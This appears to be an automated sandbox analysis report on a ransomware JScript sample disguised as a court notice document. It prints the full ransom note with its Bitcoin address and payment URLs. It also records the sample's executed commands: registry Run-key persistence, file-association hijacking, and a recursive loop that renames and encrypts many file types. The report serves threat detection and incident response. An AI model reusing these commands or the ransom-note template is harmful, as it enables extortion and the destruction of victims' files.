Analysis

  • max time kernel
    150s
  • max time network
    133s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    15-01-2021 15:50

General

  • Target

    Notice_to_Appear_00614075.doc.js

  • Size

    37KB

  • MD5

    f84c5242741ccd7949762ca5cbb96556

  • SHA1

    894c726e0a3e8cf3fd98690c27f885c4aa775775

  • SHA256

    aa5b2a6a2711cde023d91112c0574f121b4edd6c8b62409155e75d36f38b0bb6

  • SHA512

    5f5716fdf73bd38f28e36cf2d8dc5a8b8ec613a3665e43e5103206fb1bc9f32ad8a44c40cea9cf037f609ad33579569b86c8fd2002832d1daf63218e27feab71

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\a.txt

Ransom Note
ATTENTION! All your documents, photos, databases and other important personal files were encrypted using strong RSA-1024 algorithm with a unique key. To restore your files you have to pay 0.47952 BTC (bitcoins). Please follow this manual: 1. Create Bitcoin wallet here: https://blockchain.info/wallet/new 2. Buy 0.47952 BTC with cash, using search here: https://localbitcoins.com/buy_bitcoins 3. Send 0.47952 BTC to this Bitcoin address: 16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB 4. Open one of the following links in your browser to download decryptor: http://sswboiler.com/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB http://bucataria-sylviei.ro/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB http://lifan-m.ru/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB http://www.czarnieckiliny.pl/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB http://demo3.twt.it/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB 5. Run decryptor to restore your files. PLEASE REMEMBER: - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES. - Nobody can help you except us. - It`s useless to reinstall Windows, update antivirus software, etc. - Your files can be decrypted only after you make payment. - You can find this manual on your desktop (DECRYPT.txt).
Wallets

16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

URLs

http://sswboiler.com/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

http://bucataria-sylviei.ro/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

http://lifan-m.ru/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

http://www.czarnieckiliny.pl/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

http://demo3.twt.it/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Notice_to_Appear_00614075.doc.js
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:4712
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3828
      • C:\Windows\system32\reg.exe
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
        3⤵
        • Adds Run key to start application
        PID:3104
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4020
      • C:\Windows\system32\reg.exe
        REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
        3⤵
        • Modifies registry class
        PID:4484
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3944
      • C:\Windows\system32\reg.exe
        REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
        3⤵
        • Modifies registry class
        PID:4512
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"
      2⤵
      PID:4300
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"
      2⤵
      PID:4060
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" eshcq5kixoxv136vc35cel0lp2it1p3zz4r4)
      2⤵
      PID:3052

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Persistence
    Registry Run Keys / Startup Folder (T1060): 1
  • Defense Evasion
    Modify Registry (T1112): 1
  • Credential Access
    Credentials in Files (T1081): 1
  • Collection
    Data from Local System (T1005): 1


Downloads

  • C:\Users\Admin\AppData\Local\Temp\a.txt
    MD5
    31ff92435ec51fab9b7ba2ed4c15dd3e
    SHA1
    696a564dde590c05ad07c16357304fe1c9b25710
    SHA256
    b5aec39215b6000a55dca8f51e96338deb950d5d29796eae1683acb6740cb143
    SHA512
    7066800f4473fe6937ea28e8885aded0db866a5c2c9eb1a8bb4473ea4b069cb54bd87b48f060b32cdaac884f42c0e32360999386426ba0e8752c53dbf8da39f6

  • C:\Users\Admin\AppData\Local\Temp\a0.exe
    MD5
    aa95b86d3ba312056034964adc1e19b2
    SHA1
    4b17b2c278462245e95cafdef16fff76401ba105
    SHA256
    773f80fcae6ac4fe16fb497a23e5596dfcec643ff14967c76366d3b333f3d7b9
    SHA512
    a992837759a461396ba8796ba63229e05b288e115961adec6a0730ee67d5500e923c6f9b6e5835193e09f2f15185185a28c1afd28c48ae6fa326d5bf405104e8

  • memory/3052-9-0x0000000000000000-mapping.dmp
  • memory/3104-8-0x0000000000000000-mapping.dmp
  • memory/3828-3-0x0000000000000000-mapping.dmp
  • memory/3944-5-0x0000000000000000-mapping.dmp
  • memory/4020-4-0x0000000000000000-mapping.dmp
  • memory/4060-7-0x0000000000000000-mapping.dmp
  • memory/4300-6-0x0000000000000000-mapping.dmp
  • memory/4484-12-0x0000000000000000-mapping.dmp
  • memory/4512-10-0x0000000000000000-mapping.dmp
  • memory/4712-2-0x000001A3A89B0000-0x000001A3A89B4000-memory.dmp
    Filesize
    16KB